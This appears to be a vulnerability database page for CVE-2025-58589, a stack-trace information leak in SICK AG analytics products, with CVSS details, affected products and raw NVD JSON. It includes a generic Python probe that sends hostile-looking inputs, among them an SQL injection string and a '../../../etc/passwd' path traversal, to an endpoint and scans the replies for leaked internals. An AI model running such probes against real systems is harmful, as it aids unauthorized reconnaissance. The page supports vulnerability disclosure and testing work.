Security Vulnerability Report
CVE-2025-58589 CVSS 2.7 LOW (vendor/PSIRT score; the NVD primary assessment in the raw data below rates it 6.5 MEDIUM)

CVE-2025-58589

Published: 2025-10-06 07:15:36
Last Modified: 2026-01-27 19:45:57

Description

When an error occurs in the application a full stacktrace is provided to the user. The stacktrace lists class and method names as well as other internal information. An attacker thus receives information about the technology used and the structure of the application.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Note: the score and vector above are the vendor's (SICK PSIRT, "Secondary") assessment. The NVD "Primary" assessment in the raw JSON below is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N, base score 6.5 (MEDIUM). The two differ on privileges required (PR:H vs PR:L) and confidentiality impact (C:L vs C:H); when prioritising, check which level of access actually reaches the error pages in your deployment rather than relying on the headline LOW rating.

Configurations (Affected Products)

cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:* - VULNERABLE
SICK AG products (the CPE entries above use a version wildcard; refer to the official security advisory sca-2025-0010 for the specific affected versions and fixed releases).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a generic error-provoking probe: the endpoint, bearer token and request payloads are placeholders, and nothing in it is taken from the vendor advisory or specific to the affected SICK products. A negative result therefore says nothing about whether a given installation is patched, and the stack-trace and keyword matching is heuristic (case-insensitive substring search), so hits should be confirmed by reading the printed response excerpt.
python
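# CVE-2025-58589 PoC - SICK Product Stack Trace Information Disclosure
# This PoC sends a handful of error-provoking requests to an authenticated
# endpoint and checks each response body for stack-trace indicators. It is a
# generic probe: the URL, token and payloads below are placeholders and nothing
# here is specific to the affected SICK products or taken from the advisory.
from __future__ import annotations

# Target configuration
TARGET_URL = "https://target-sick-product.example.com/api/endpoint"
AUTH_TOKEN = "authenticated_session_token"  # Requires high privilege (PR:H)

# Headers with authentication
headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0 (compatible; SecurityResearcher/1.0)",
}

# Substrings whose case-insensitive presence in a response body is taken as
# evidence of a leaked stack trace. Checked in order; the first hit is reported.
# NOTE: "Exception" and "at line" also occur in ordinary prose, so a hit should
# be confirmed by reading the printed excerpt rather than trusted blindly.
STACK_TRACE_INDICATORS = (
    "Exception",
    "Traceback",
    "at line",
    ".java:",
    ".py:",
    "Stack trace",
    "Caused by:",
    "at com.sick.",
    "at org.springframework.",
)

# Categories of internal detail a leaked stack trace may expose, keyed by the
# label printed for each match. Matching is case-insensitive substring search,
# so broad patterns such as "build" or "version" can match benign text.
# "C:\\" (a single backslash at runtime) matches a plain Windows path such as
# C:\Program Files\... as well as its JSON-escaped form C:\\...; the previous
# two-backslash pattern only matched the escaped form.
SENSITIVE_PATTERNS = {
    "Framework": ["springframework", "django", "flask", "struts", "tomcat"],
    "Database": ["mysql", "postgresql", "oracle", "hibernate", "jdbc"],
    "File Paths": ["/opt/", "/var/", "C:\\", "/home/"],
    "Class Names": ["com.sick.", "de.sick.", "sick.ag."],
    "Version Info": ["version", "v1.", "v2.", "build"],
}

# Request bodies intended to push the endpoint into an error path. Each one is
# a well-formed JSON document (requests serialises the dict), so what reaches
# the server is valid JSON whose *values* are hostile; none of them does
# anything destructive on its own, but they are still only appropriate against
# systems you are authorised to test.
ERROR_PAYLOADS = [
    # String that looks like malformed JSON, in case the server re-parses field values
    {"data": "{{invalid_json"},
    # Null value where the handler may expect a populated field
    {"parameter": None, "action": "process"},
    # Type confusion: object where an integer is expected
    {"id": {"nested": "object"}, "expected": "integer"},
    # Oversized input to provoke a length/validation error (not a buffer overflow
    # in a managed runtime)
    {"input": "A" * 10000},
    # SQL-looking string to provoke a database-layer error message
    {"query": "'; DROP TABLE--"},
    # Path-looking string to provoke a file-not-found / access error
    {"file": "../../../etc/passwd"},
]


def _find_stack_trace_indicator(text: str) -> str | None:
    """Return the first STACK_TRACE_INDICATORS entry found in *text*, or None.

    The comparison is case-insensitive substring search, so it is a heuristic
    and can produce false positives on ordinary prose.
    """
    lowered = text.lower()
    for indicator in STACK_TRACE_INDICATORS:
        if indicator.lower() in lowered:
            return indicator
    return None


def trigger_stack_trace_disclosure(url: str, headers: dict[str, str]) -> str | None:
    """POST each ERROR_PAYLOADS entry to *url* and return the first body that looks like a stack trace.

    Args:
        url: Endpoint to send the error-provoking requests to.
        headers: HTTP headers, including the Authorization header.

    Returns:
        The full response body of the first response containing a stack-trace
        indicator, or None if no payload produced one (or every request failed).
    """
    # Imported here so the pure analysis helpers above can be used (and tested)
    # without the third-party dependency installed.
    import requests

    for attempt, payload in enumerate(ERROR_PAYLOADS, start=1):
        print(f"\n[*] Attempt {attempt}: Sending payload to trigger error...")
        try:
            # TLS verification is left at its default (enabled); do not add verify=False.
            response = requests.post(url, headers=headers, json=payload, timeout=10)
        except requests.exceptions.RequestException as exc:
            print(f"[-] Request failed: {exc}")
            continue
        indicator = _find_stack_trace_indicator(response.text)
        if indicator is not None:
            print(f"[+] Stack trace detected! Indicator: {indicator}")
            # The excerpt may itself contain internal paths or credentials; keep
            # the output in a controlled location.
            print(f"[+] Response excerpt:\n{response.text[:2000]}")
            return response.text
    print("\n[-] No stack trace disclosure detected")
    return None


def analyze_disclosed_info(stack_trace: str | None) -> list[tuple[str, str]]:
    """Print and return the (category, pattern) pairs from SENSITIVE_PATTERNS found in *stack_trace*.

    Args:
        stack_trace: Response body believed to contain a stack trace.

    Returns:
        The matched (category, pattern) pairs in SENSITIVE_PATTERNS order; an
        empty list (with nothing printed) when *stack_trace* is empty or None.
    """
    if not stack_trace:
        return []
    print("\n[*] Analyzing disclosed information...")
    lowered = stack_trace.lower()
    findings = [
        (category, pattern)
        for category, patterns in SENSITIVE_PATTERNS.items()
        for pattern in patterns
        if pattern.lower() in lowered
    ]
    for category, pattern in findings:
        print(f"[+] Detected {category}: {pattern}")
    return findings


if __name__ == "__main__":
    banner = "=" * 60
    print(banner)
    print("CVE-2025-58589 - Stack Trace Information Disclosure PoC")
    print("Affected: SICK AG Industrial Products")
    # Vendor score; NVD's primary assessment of this CVE is 6.5 (MEDIUM).
    print("CVSS: 2.7 (LOW)")
    print(banner)
    result = trigger_stack_trace_disclosure(TARGET_URL, headers)
    if result:
        analyze_disclosed_info(result)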

References (from the `references` array in the raw JSON below): SICK PSIRT page (https://sick.com/psirt), the CSAF advisory sca-2025-0010 in JSON and PDF form under https://www.sick.com/.well-known/csaf/white/2025/, SICK's cybersecurity operating guidelines, and CISA's ICS recommended practices.

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58589", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:35.720", "lastModified": "2026-01-27T19:45:57.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When an error occurs in the application a full stacktrace is provided to the user. The stacktrace lists class and method names as well as other internal information. An attacker thus receives information about the technology used and the structure of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "E62416BA-1BF1-43BD-98B2-57BD34128419"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "27031959-2981-4755-9E3D-02CD083F2B72"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "5955214B-0D71-449A-BFD4-8804FDF91CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "86C0BA69-E701-45A3-ADA5-130B8AD9DF15"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}